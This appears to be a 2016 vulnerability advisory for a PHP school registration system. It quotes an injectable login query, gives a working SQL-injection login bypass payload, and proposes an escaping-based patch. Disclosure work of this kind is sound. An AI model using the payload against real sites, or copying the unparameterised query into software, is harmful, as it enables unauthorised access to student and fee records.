# Exploit Title.............. School Registration and Fee System Auth Bypass
# Google Dork................ N/A
# Date....................... 01/11/2016
# Exploit Author............. opt1lc
# Vendor Homepage............ http://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/hemedy99/bilal_final.zip
# Version.................... N/A
# Tested on.................. XAMPP
# CVE........................ N/A
# File....................... bilal_final/login.php
---------------------------------------------------
----snip----
$username = $_POST['username'];
$password = $_POST['password'];
/* student */
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysql_query($query)or die(mysql_error());
$row = mysql_fetch_array($result);
----snip----
---------------------------------------------------
Exploit
-------
You can login with username and password : administrator' or '1'='1
Patching
-------
You can use one of function in PHP : mysql_real_escape_string() to
---------------------------------------------------
----snip----
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
/* student */
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysql_query($query)or die(mysql_error());
$row = mysql_fetch_array($result);
----snip----
---------------------------------------------------
Credit
-------
This vulnerability was discovered and researched by opt1lc
Shout
-------
My Beautiful Daughter & My Wife
Reference
-------
http://php.net/manual/en/function.mysql-real-escape-string.php
